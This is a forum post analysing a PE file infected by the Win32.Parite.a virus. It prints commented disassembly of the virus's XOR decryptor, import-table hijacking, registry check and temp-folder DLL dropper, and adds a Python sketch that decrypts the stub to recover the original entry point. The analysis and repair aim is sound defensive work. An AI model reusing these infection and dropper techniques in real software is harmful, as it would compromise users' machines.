What a pain! My computer got infected, and the tools I had collected over many years, plus a few small programs I wrote myself, were all infected. I looked it up online: it is WIN32.parite.a.
So I analysed an exe file it had infected and am posting the result here to exchange with everyone; please point out anything I got wrong.
Virus analysis
Enough talk, let's go straight to the code.
00406000 > B9 1857D200 mov ecx, 0D25718
00406005 68 16604000 push 00406016 ; there are no relocations, so the program crashes if it is not loaded at the default image base
0040600A 5F pop edi
0040600B BA C4060000 mov edx, 6C4
00406010 310C3A xor dword ptr [edx+edi], ecx
00406013 4A dec edx
00406014 83EA 03 sub edx, 3
00406017 ^ 75 F7 jnz short 00406010
00406019 90 nop
0040601A F0:2AD3 lock sub dl, bl ; lock prefix not allowed (still-encrypted bytes, not real code)
0040601D 0018 add byte ptr [eax], bl
0040601F 57 push edi
When infecting a file, the virus appends a section to the exe (the section name is generated randomly), saves the original entry point and image base, and rewrites the entry point to point at the virus code.
When it writes itself into the file, the virus body is XOR-encrypted with a randomly generated number; the code above is the decryption loop. The decoded code:
00406000 > B9 1857D200 mov ecx, 0D25718
00406005 68 16604000 push 00406016
0040600A 5F pop edi
0040600B BA C4060000 mov edx, 6C4
00406010 310C3A xor dword ptr [edx+edi], ecx
00406013 4A dec edx
00406014 83EA 03 sub edx, 3
00406017 ^ 75 F7 jnz short 00406010
00406019 90 nop
0040601A E8 7D010000 call 0040619C ; this call is the virus code
0040601F 0000 add byte ptr [eax], al
00406021 0000 add byte ptr [eax], al
00406023 0040 00 add byte ptr [eax], al
00406026 0010 add byte ptr [eax], dl
00406028 0000 add byte ptr [eax], al
0040602A 0028 add byte ptr [eax], ch
0040602C 0000 add byte ptr [eax], al
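As an added example (not code from the original post), the following Python reproduces the decrypt loop above and then reads the saved image base and original entry-point RVA from the decrypted header, which is the first thing a repair tool for this infection needs. The constants and section layout are taken from the listing; the input is a constructed sample, not a real infected file, and the stub is assumed to sit at the start of the virus section.

```python
import struct

# Constants from the listing above: the stub sits at 0x406000 in the virus section.
STUB_VA, KEY, EDI, COUNT = 0x406000, 0x0D25718, 0x406016, 0x6C4
# Opcode bytes of the loop: xor [edx+edi],ecx ; dec edx ; sub edx,3 ; jnz short
LOOP_BODY = bytes.fromhex("310C3A4A83EA0375F7")

def parse_stub(section):
    """Return (key, edi, count) if the section opens with the decrypt stub, else None."""
    if len(section) < 0x1A or section[0] != 0xB9 or section[5] != 0x68:
        return None
    if section[0xA] != 0x5F or section[0xB] != 0xBA or section[0x10:0x19] != LOOP_BODY:
        return None
    key, = struct.unpack_from("<I", section, 1)      # mov ecx, key
    edi, = struct.unpack_from("<I", section, 6)      # push imm32 / pop edi
    count, = struct.unpack_from("<I", section, 0xC)  # mov edx, count
    return key, edi, count

def xor_region(section, section_va, key, edi, count):
    """Emulate the loop: XOR the dword at [edi+edx] for edx = count, count-4, ..., 4."""
    if count % 4 or edi + count + 4 - section_va > len(section):
        raise ValueError("loop would never terminate or run past the section")
    buf, edx = bytearray(section), count
    while edx:                                   # jnz short: stop once edx hits 0
        off = edi + edx - section_va
        struct.pack_into("<I", buf, off, struct.unpack_from("<I", buf, off)[0] ^ key)
        edx -= 4                                 # dec edx ; sub edx, 3
    return bytes(buf)

def recover_original_entry(section, section_va):
    """Decrypt the payload and read the saved image base / entry RVA (body: edx = retaddr - 5)."""
    info = parse_stub(section)
    if info is None:
        return None
    key, edi, count = info
    plain = xor_region(section, section_va, key, edi, count)
    call_off = edi + 4 - section_va              # first decrypted dword is the call itself
    if plain[call_off] != 0xE8:
        return None
    image_base, oep_rva = struct.unpack_from("<II", plain, call_off + 8)   # [edx+8], [edx+0xC]
    return image_base, oep_rva, image_base + oep_rva

def build_sample():
    """Constructed input (not a real infected file): the stub, then the decoded call and
    saved header (base 0x400000, entry RVA 0x1000) padded with zeros and XOR-encrypted."""
    stub = (b"\xB9" + struct.pack("<I", KEY) + b"\x68" + struct.pack("<I", EDI) + b"\x5F"
            + b"\xBA" + struct.pack("<I", COUNT) + LOOP_BODY + b"\x90")
    payload = b"\xE8\x7D\x01\x00\x00" + b"\x00" * 3 + struct.pack("<II", 0x00400000, 0x1000)
    plain = stub + payload + b"\x00" * (COUNT - len(payload))
    return xor_region(plain, STUB_VA, KEY, EDI, COUNT)   # XOR is its own inverse
```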
Entering call 0040619C:
0040619C 55 push ebp
0040619D 8BEC mov ebp, esp
0040619F 81C4 B4FEFFFF add esp, -14C
004061A5 C645 F7 00 mov byte ptr [ebp-9], 0 ; flag
004061A9 8BC5 mov eax, ebp
004061AB 83C0 04 add eax, 4
004061AE 8B10 mov edx, dword ptr [eax]
004061B0 83EA 05 sub edx, 5
004061B3 8955 FC mov dword ptr [ebp-4], edx ; edx = return address - 5, the start of the decrypted virus code
004061B6 8B4D FC mov ecx, dword ptr [ebp-4]
004061B9 81C1 84000000 add ecx, 84
004061BF 894D F8 mov dword ptr [ebp-8], ecx
004061C2 8B45 FC mov eax, dword ptr [ebp-4]
004061C5 8B50 0C mov edx, dword ptr [eax+C] ; read the original program's entry point into edx
004061C8 8B4D FC mov ecx, dword ptr [ebp-4]
004061CB 0351 08 add edx, dword ptr [ecx+8] ; image base + entry point gives the start address of the original code
004061CE 8BC5 mov eax, ebp
004061D0 83C0 04 add eax, 4
004061D3 8910 mov dword ptr [eax], edx ; store it in [ebp+4] so that, once the virus code finishes, the ret goes straight to the original program
004061D5 FF75 F8 push dword ptr [ebp-8]
004061D8 FF75 FC push dword ptr [ebp-4]
004061DB 8D55 BC lea edx, dword ptr [ebp-44]
004061DE 52 push edx
004061DF E8 78000000 call 0040625C ; obtain the addresses of the functions that will be used
004061E4 84C0 test al, al
004061E6 74 6D je short 00406255
004061E8 FF75 F8 push dword ptr [ebp-8]
004061EB 8D4D BC lea ecx, dword ptr [ebp-44]
004061EE 51 push ecx
004061EF 8D85 B4FEFFFF lea eax, dword ptr [ebp-14C]
004061F5 50 push eax
004061F6 E8 05020000 call 00406400
004061FB 84C0 test al, al ; test al; if zero, jump to 406222 and drop the virus body again
004061FD 74 23 je short 00406222
004061FF 66:83BD B4FEFFF>cmp word ptr [ebp-14C], 6 ; compare the first word of the registry data with 6
00406207 72 19 jb short 00406222 ; if below, go to 406222 and drop the virus body again
00406209 FF75 F8 push dword ptr [ebp-8]
0040620C FF75 FC push dword ptr [ebp-4]
0040620F 8D55 BC lea edx, dword ptr [ebp-44]
00406212 52 push edx
00406213 8D8D B6FEFFFF lea ecx, dword ptr [ebp-14A]
00406219 51 push ecx ; read the registry value PINF to get the path of the virus dll
0040621A E8 51020000 call 00406470
0040621F 8845 F7 mov byte ptr [ebp-9], al ; store the return value in the flag
00406222 807D F7 00 cmp byte ptr [ebp-9], 0 ; if the flag is zero, continue downward; otherwise leave
00406226 75 2D jnz short 00406255
00406228 FF75 FC push dword ptr [ebp-4]
0040622B 8D45 BC lea eax, dword ptr [ebp-44]
0040622E 50 push eax
0040622F 8D95 B6FEFFFF lea edx, dword ptr [ebp-14A]
00406235 52 push edx
00406236 E8 81020000 call 004064BC ; drop the virus body
0040623B 84C0 test al, al
0040623D 74 16 je short 00406255
0040623F FF75 F8 push dword ptr [ebp-8]
00406242 FF75 FC push dword ptr [ebp-4]
00406245 8D4D BC lea ecx, dword ptr [ebp-44]
00406248 51 push ecx
00406249 8D85 B6FEFFFF lea eax, dword ptr [ebp-14A]
0040624F 50 push eax
00406250 E8 1B020000 call 00406470 ; load and run the newly created dll file
00406255 8BE5 mov esp, ebp
00406257 5D pop ebp
00406258 C3 retn
That is the code inside the call, with my comments added; below we analyse in detail what each of the calls does.
004061DF E8 78000000 call 0040625C
It mainly obtains the addresses of the functions the virus uses; here is how it does that.
Code:
0040625C 55 push ebp
0040625D 8BEC mov ebp, esp
0040625F 51 push ecx
00406260 8B45 0C mov eax, dword ptr [ebp+C]
00406263 8B50 20 mov edx, dword ptr [eax+20] ; read the import table to get the address of LoadLibraryA
00406266 8B0A mov ecx, dword ptr [edx]
00406268 8B45 08 mov eax, dword ptr [ebp+8]
0040626B 8908 mov dword ptr [eax], ecx
0040626D 8B55 0C mov edx, dword ptr [ebp+C]
00406270 8B4A 20 mov ecx, dword ptr [edx+20]
00406273 83C1 04 add ecx, 4
00406276 8B01 mov eax, dword ptr [ecx] ; read the import table to get the address of GetProcAddress
At this point the reader should take a good look at the PE import table; there is plenty of material on it in the forum, so I will not repeat it here.
The virus first finds the IID (import descriptor) for kernel32.dll and modifies the first two INT entries so that they point at the LoadLibraryA and GetProcAddress names in its own section. When the infected program runs, the PE loader walks OriginalFirstThunk, resolves the address of the function named by each IMAGE_IMPORT_BY_NAME structure and writes it into the corresponding IAT slot, so once the program is running, the first two IAT entries hold the addresses of LoadLibraryA and GetProcAddress.
The virus saves the names of the functions it displaced; once it has LoadLibraryA and GetProcAddress, it resolves those functions dynamically and writes their addresses back into the original IAT.
00406278 8B55 08 mov edx, dword ptr [ebp+8]
0040627B 8942 04 mov dword ptr [edx+4], eax
0040627E FF75 10 push dword ptr [ebp+10]
00406281 8B4D 08 mov ecx, dword ptr [ebp+8]
00406284 FF11 call dword ptr [ecx] ; call LoadLibraryA to load kernel32.dll
00406286 8945 FC mov dword ptr [ebp-4], eax
00406289 837D FC 00 cmp dword ptr [ebp-4], 0
0040628D 0F84 F9000000 je 0040638C
00406293 8B45 0C mov eax, dword ptr [ebp+C]
00406296 FF70 24 push dword ptr [eax+24]
00406299 FF75 FC push dword ptr [ebp-4]
0040629C 8B55 08 mov edx, dword ptr [ebp+8]
0040629F FF52 04 call dword ptr [edx+4] ; call GetProcAddress
004062A2 8B4D 0C mov ecx, dword ptr [ebp+C]
004062A5 8B51 20 mov edx, dword ptr [ecx+20]
004062A8 8902 mov dword ptr [edx], eax ; obtain the address of GetCommandLineA and write it back into the original import table
004062AA 8B45 0C mov eax, dword ptr [ebp+C]
004062AD FF70 28 push dword ptr [eax+28]
004062B0 FF75 FC push dword ptr [ebp-4]
004062B3 8B4D 08 mov ecx, dword ptr [ebp+8]
004062B6 FF51 04 call dword ptr [ecx+4]
004062B9 8B55 0C mov edx, dword ptr [ebp+C]
004062BC 8B4A 20 mov ecx, dword ptr [edx+20]
004062BF 83C1 04 add ecx, 4
004062C2 8901 mov dword ptr [ecx], eax ; obtain the address of lstrcpyA and write it back into the original import table
004062C4 8B45 10 mov eax, dword ptr [ebp+10]
004062C7 83C0 0D add eax, 0D ; the code below obtains the addresses of the functions the virus code needs
004062CA 50 push eax
004062CB FF75 FC push dword ptr [ebp-4]
004062CE 8B45 08 mov eax, dword ptr [ebp+8]
004062D1 FF50 04 call dword ptr [eax+4]
004062D4 8B55 08 mov edx, dword ptr [ebp+8]
004062D7 8942 08 mov dword ptr [edx+8], eax ; kernel32.GetTempPathA
…
Next is this CALL
004061F6 E8 05020000 call 00406400
Entering it:
00406400 55 push ebp
00406401 8BEC mov ebp, esp
00406403 83C4 F4 add esp, -0C
00406406 C645 FB 00 mov byte ptr [ebp-5], 0 ; flag
0040640A C745 F4 0601000>mov dword ptr [ebp-C], 106
00406411 8D45 FC lea eax, dword ptr [ebp-4]
00406414 50 push eax ; pHandle = 0012FE20
00406415 68 19000200 push 20019 ; Access = KEY_READ
0040641A 6A 00 push 0 ; Reserved = 0
0040641C 8B55 10 mov edx, dword ptr [ebp+10]
0040641F 81C2 BD000000 add edx, 0BD
00406425 52 push edx ; Subkey = "Software\Microsoft\Windows\CurrentVersion\Explorer"
00406426 68 01000080 push 80000001 ; hKey=HKEY_CURRENT_USER
0040642B 8B4D 0C mov ecx, dword ptr [ebp+C]
0040642E FF51 2C call dword ptr [ecx+2C] ; CALL to ADVAPI32.RegOpenKeyExA
00406431 85C0 test eax, eax
00406433 75 32 jnz short 00406467 ; jump if non-zero, leaving al=0
00406435 8D45 F4 lea eax, dword ptr [ebp-C]
00406438 50 push eax ; pBufSize = 0012FE18
00406439 FF75 08 push dword ptr [ebp+8] ; Buffer = 0012FE38
0040643C 6A 00 push 0 ; pValueType = NULL
0040643E 6A 00 push 0 ; Reserved = NULL
00406440 8B55 10 mov edx, dword ptr [ebp+10]
00406443 81C2 F0000000 add edx, 0F0
00406449 52 push edx ; ValueName = "PINF"
0040644A FF75 FC push dword ptr [ebp-4] ; hKey = A8
0040644D 8B4D 0C mov ecx, dword ptr [ebp+C]
00406450 FF51 30 call dword ptr [ecx+30] ; CALL to RegQueryValueExA
00406453 85C0 test eax, eax ; if the value PINF exists, eax=0
00406455 0F94C0 sete al ; and then al=1
00406458 83E0 01 and eax, 1
0040645B 8845 FB mov byte ptr [ebp-5], al
0040645E FF75 FC push dword ptr [ebp-4] ; hKey = 000000A8
00406461 8B55 0C mov edx, dword ptr [ebp+C]
00406464 FF52 34 call dword ptr [edx+34] ; ADVAPI32.RegCloseKey
00406467 8A45 FB mov al, byte ptr [ebp-5]
0040646A 8BE5 mov esp, ebp
0040646C 5D pop ebp ; 0012FF84
0040646D C2 0C00 retn 0C
I have commented all of the above; it mainly reads the registry: if the value exists, al is set to 1 and the data read is kept, otherwise al is zero.
Now we analyse this CALL
0040621A E8 51020000 call 00406470
Code:
00406470 55 push ebp
00406471 8BEC mov ebp, esp
00406473 83C4 F8 add esp, -8
00406476 FF75 08 push dword ptr [ebp+8] ; ASCII "C:\Users\Lenovo\AppData\Local\Temp\vydF2D7.tmp"
00406479 8B45 0C mov eax, dword ptr [ebp+C]
0040647C FF10 call dword ptr [eax] ; call LoadLibraryA
0040647E 8945 FC mov dword ptr [ebp-4], eax
00406481 837D FC 00 cmp dword ptr [ebp-4], 0
00406485 74 2A je short 004064B1
00406487 8B55 14 mov edx, dword ptr [ebp+14]
0040648A 81C2 F5000000 add edx, 0F5
00406490 52 push edx ; get the address of the function Initiate
00406491 FF75 FC push dword ptr [ebp-4]
00406494 8B4D 0C mov ecx, dword ptr [ebp+C]
00406497 FF51 04 call dword ptr [ecx+4] ; call GetProcAddress
0040649A 8945 F8 mov dword ptr [ebp-8], eax ; vydF2D7.Initiate
0040649D 837D F8 00 cmp dword ptr [ebp-8], 0
004064A1 74 0E je short 004064B1
004064A3 FF75 10 push dword ptr [ebp+10]
004064A6 FF55 F8 call dword ptr [ebp-8] ; call vydF2D7.Initiate, i.e. the real virus body runs
004064A9 84C0 test al, al
004064AB 74 04 je short 004064B1
004064AD B0 01 mov al, 1
004064AF EB 02 jmp short 004064B3
004064B1 33C0 xor eax, eax
004064B3 59 pop ecx
004064B4 59 pop ecx
004064B5 5D pop ebp
004064B6 C2 1000 retn 10
The above takes the registry data, obtains the path of the virus that actually runs, and loads and runs it dynamically.
The last CALL
00406236 E8 81020000 call 004064BC
Code:
004064BC 55 push ebp
004064BD 8BEC mov ebp, esp
004064BF 50 push eax
004064C0 B8 02000000 mov eax, 2
004064C5 81C4 04F0FFFF add esp, -0FFC ; allocate stack space
004064CB 50 push eax
004064CC 48 dec eax
004064CD ^ 75 F6 jnz short 004064C5
004064CF 8B45 FC mov eax, dword ptr [ebp-4]
004064D2 81C4 E4F6FFFF add esp, -91C
004064D8 68 04010000 push 104 ; BufSize = 104 (260.)
004064DD 8D85 E0FEFFFF lea eax, dword ptr [ebp-120]
004064E3 50 push eax ; PathBuffer = 0012FD04
004064E4 6A 00 push 0 ; hModule = NULL
004064E6 8B55 0C mov edx, dword ptr [ebp+C]
004064E9 FF52 28 call dword ptr [edx+28] ; CALL to GetModuleFileNameA
004064EC 6A 00 push 0 ; hTemplateFile = NULL
004064EE 6A 01 push 1 ; Attributes = READONLY
004064F0 6A 03 push 3 ; Mode = OPEN_EXISTING
004064F2 6A 00 push 0 ; pSecurity = NULL
004064F4 6A 01 push 1 ; ShareMode = FILE_SHARE_READ
004064F6 68 00000080 push 80000000 ; Access = GENERIC_READ
004064FB 8D8D E0FEFFFF lea ecx, dword ptr [ebp-120]
00406501 51 push ecx ; FileName = "F:\masm Object\EnumWindows\EnumWindows.exe"
i.e. it opens itself for reading
00406502 8B45 0C mov eax, dword ptr [ebp+C]
00406505 FF50 10 call dword ptr [eax+10] ; CALL to CreateFileA
00406508 8945 F4 mov dword ptr [ebp-C], eax
0040650B 837D F4 FF cmp dword ptr [ebp-C], -1
0040650F 0F84 72010000 je 00406687
00406515 8D95 E0FEFFFF lea edx, dword ptr [ebp-120]
0040651B 52 push edx ; get the temp folder path
0040651C 68 04010000 push 104
00406521 8B4D 0C mov ecx, dword ptr [ebp+C]
00406524 FF51 08 call dword ptr [ecx+8] ; call to GetTempPath
00406527 8B45 0C mov eax, dword ptr [ebp+C]
0040652A FF50 24 call dword ptr [eax+24]
0040652D 8945 F8 mov dword ptr [ebp-8], eax ; /
00406530 33D2 xor edx, edx ; create a file in the temp folder; the first three letters of its name are generated randomly
00406532 8955 EC mov dword ptr [ebp-14], edx
00406535 8B4D EC mov ecx, dword ptr [ebp-14]
00406538 33C0 xor eax, eax
0040653A 8A440D F8 mov al, byte ptr [ebp+ecx-8]
0040653E B9 0A000000 mov ecx, 0A
00406543 99 cdq
00406544 F7F9 idiv ecx
00406546 04 61 add al, 61
00406548 8B55 EC mov edx, dword ptr [ebp-14]
0040654B 884415 F8 mov byte ptr [ebp+edx-8], al
0040654F FF45 EC inc dword ptr [ebp-14]
00406552 837D EC 02 cmp dword ptr [ebp-14], 2
00406556 ^ 7E DD jle short 00406535 ; \
00406558 C645 FB 00 mov byte ptr [ebp-5], 0
0040655C FF75 08 push dword ptr [ebp+8] ; TempName
0040655F 6A 00 push 0 ; Unique = 0
00406561 8D45 F8 lea eax, dword ptr [ebp-8]
00406564 50 push eax ; Prefix = "bqb"
00406565 8D8D E0FEFFFF lea ecx, dword ptr [ebp-120]
0040656B 51 push ecx ; Path = "C:\Users\Lenovo\AppData\Local\Temp\"
0040656C 8B45 0C mov eax, dword ptr [ebp+C]
0040656F FF50 0C call dword ptr [eax+C] ; CALL to GetTempFileNameA
00406572 6A 00 push 0 ; hTemplateFile = NULL
00406574 68 80000000 push 80 ; Attributes = NORMAL
00406579 6A 02 push 2 ; Mode = CREATE_ALWAYS
0040657B 6A 00 push 0 ; pSecurity = NULL
0040657D 6A 01 push 1 ; ShareMode = FILE_SHARE_READ
0040657F 68 000000C0 push C0000000 ; Access = GENERIC_READ|GENERIC_WRITE
00406584 FF75 08 push dword ptr [ebp+8] ; FileName = "C:\Users\Lenovo\AppData\Local\Temp\bqbCF35.tmp"
00406587 8B55 0C mov edx, dword ptr [ebp+C]
0040658A FF52 10 call dword ptr [edx+10] ; CALL to CreateFileA
0040658D 8945 F0 mov dword ptr [ebp-10], eax
00406590 837D F0 FF cmp dword ptr [ebp-10], -1
00406594 0F84 DE000000 je 00406678
0040659A 8B4D 10 mov ecx, dword ptr [ebp+10]
0040659D 8B41 18 mov eax, dword ptr [ecx+18]
004065A0 8945 E8 mov dword ptr [ebp-18], eax ; eax is the size of the file to be created
004065A3 6A 00 push 0 ; Origin = FILE_BEGIN
004065A5 6A 00 push 0 ; pOffsetHi = NULL
004065A7 8B55 10 mov edx, dword ptr [ebp+10]
004065AA FF72 14 push dword ptr [edx+14] ; OffsetLo = 2EFC (12028.)
004065AD FF75 F4 push dword ptr [ebp-C] ; hFile = 000000A8 (window)
004065B0 8B4D 0C mov ecx, dword ptr [ebp+C]
004065B3 FF51 1C call dword ptr [ecx+1C] ; CALL to SetFilePointer
004065B6 817D E8 0028000>cmp dword ptr [ebp-18], 2800
004065BD 76 60 jbe short 0040661F
004065BF 6A 00 push 0 ; pOverlapped = NULL
004065C1 8D45 E4 lea eax, dword ptr [ebp-1C]
004065C4 50 push eax ; pBytesRead = 0012FE08
004065C5 68 00280000 push 2800 ; BytesToRead = 2800 (10240.)
004065CA 8D95 E0D6FFFF lea edx, dword ptr [ebp-2920]
004065D0 52 push edx ; Buffer = 0012D504
004065D1 FF75 F4 push dword ptr [ebp-C] ; hFile = 000000A8 (window)
004065D4 8B4D 0C mov ecx, dword ptr [ebp+C]
004065D7 FF51 14 call dword ptr [ecx+14] ; CALL to ReadFile
004065DA 68 00280000 push 2800
004065DF 8D85 E0D6FFFF lea eax, dword ptr [ebp-2920]
004065E5 50 push eax
004065E6 8B55 10 mov edx, dword ptr [ebp+10]
004065E9 FFB2 80000000 push dword ptr [edx+80]
004065EF E8 A0000000 call 00406694 ; XOR-decrypt the data just read
004065F4 6A 00 push 0 ; pOverlapped = NULL
004065F6 8D4D E4 lea ecx, dword ptr [ebp-1C]
004065F9 51 push ecx ; pBytesWritten = 0012FE08
004065FA 68 00280000 push 2800 ; nBytesToWrite = 2800 (10240.)
004065FF 8D85 E0D6FFFF lea eax, dword ptr [ebp-2920]
00406605 50 push eax ; Buffer = 0012D504
00406606 FF75 F0 push dword ptr [ebp-10] ; hFile = 000000AC (window)
00406609 8B55 0C mov edx, dword ptr [ebp+C]
0040660C FF52 18 call dword ptr [edx+18] ; CALL to WriteFile: write the decrypted data into the newly created file
0040660F 816D E8 0028000>sub dword ptr [ebp-18], 2800
00406616 817D E8 0028000>cmp dword ptr [ebp-18], 2800
0040661D ^ 77 A0 ja short 004065BF ; loop: read and write the next block
0040661F 6A 00 push 0 ; pOverlapped = NULL
00406621 8D4D E4 lea ecx, dword ptr [ebp-1C]
00406624 51 push ecx ; pBytesRead = 0012FE08
00406625 FF75 E8 push dword ptr [ebp-18] ; BytesToRead = 800 (2048.)
00406628 8D85 E0D6FFFF lea eax, dword ptr [ebp-2920]
0040662E 50 push eax ; Buffer = 0012D504
0040662F FF75 F4 push dword ptr [ebp-C] ; hFile = 000000A8 (window)
00406632 8B55 0C mov edx, dword ptr [ebp+C]
00406635 FF52 14 call dword ptr [edx+14] ; CALL to ReadFile
00406638 FF75 E8 push dword ptr [ebp-18]
0040663B 8D8D E0D6FFFF lea ecx, dword ptr [ebp-2920]
00406641 51 push ecx
00406642 8B45 10 mov eax, dword ptr [ebp+10]
00406645 FFB0 80000000 push dword ptr [eax+80]
0040664B E8 44000000 call 00406694 ; decrypt the last 2 KB that were read
00406650 6A 00 push 0 ; write it to the temp file
00406652 8D55 E4 lea edx, dword ptr [ebp-1C]
00406655 52 push edx
00406656 FF75 E8 push dword ptr [ebp-18]
00406659 8D8D E0D6FFFF lea ecx, dword ptr [ebp-2920]
0040665F 51 push ecx
00406660 FF75 F0 push dword ptr [ebp-10]
00406663 8B45 0C mov eax, dword ptr [ebp+C]
00406666 FF50 18 call dword ptr [eax+18] ; CALL to WriteFile
00406669 FF75 F0 push dword ptr [ebp-10]
0040666C 8B55 0C mov edx, dword ptr [ebp+C]
0040666F FF52 20 call dword ptr [edx+20] ; call CloseHandle to close the file handle
00406672 C645 FF 01 mov byte ptr [ebp-1], 1
00406676 EB 04 jmp short 0040667C
00406678 C645 FF 00 mov byte ptr [ebp-1], 0
0040667C FF75 F4 push dword ptr [ebp-C]
0040667F 8B4D 0C mov ecx, dword ptr [ebp+C]
00406682 FF51 20 call dword ptr [ecx+20] ; call CloseHandle to close the file handle
00406685 EB 04 jmp short 0040668B
00406687 C645 FF 00 mov byte ptr [ebp-1], 0
0040668B 8A45 FF mov al, byte ptr [ebp-1]
0040668E 8BE5 mov esp, ebp
00406690 5D pop ebp
00406691 C2 0C00 retn 0C
In the code above, when the registry value PINF does not exist (or for some other reason), the infected PE file drops the virus file. The virus code is carried inside the PE file itself, which is why an infected PE grows by 174 KB.
That completes the analysis. I originally wanted to write an EXE repair tool, but I am not good at analysing the dll and could not get my breakpoints to hit, so I can only hope the experts on the forum will help.
- Title: Analysis of a PE file infected by WIN32.parite.a
- Author: 末日
- Date: 2009-09-20 18:06
- Link: http://bbs.pediy.com/showthread.php?t=98167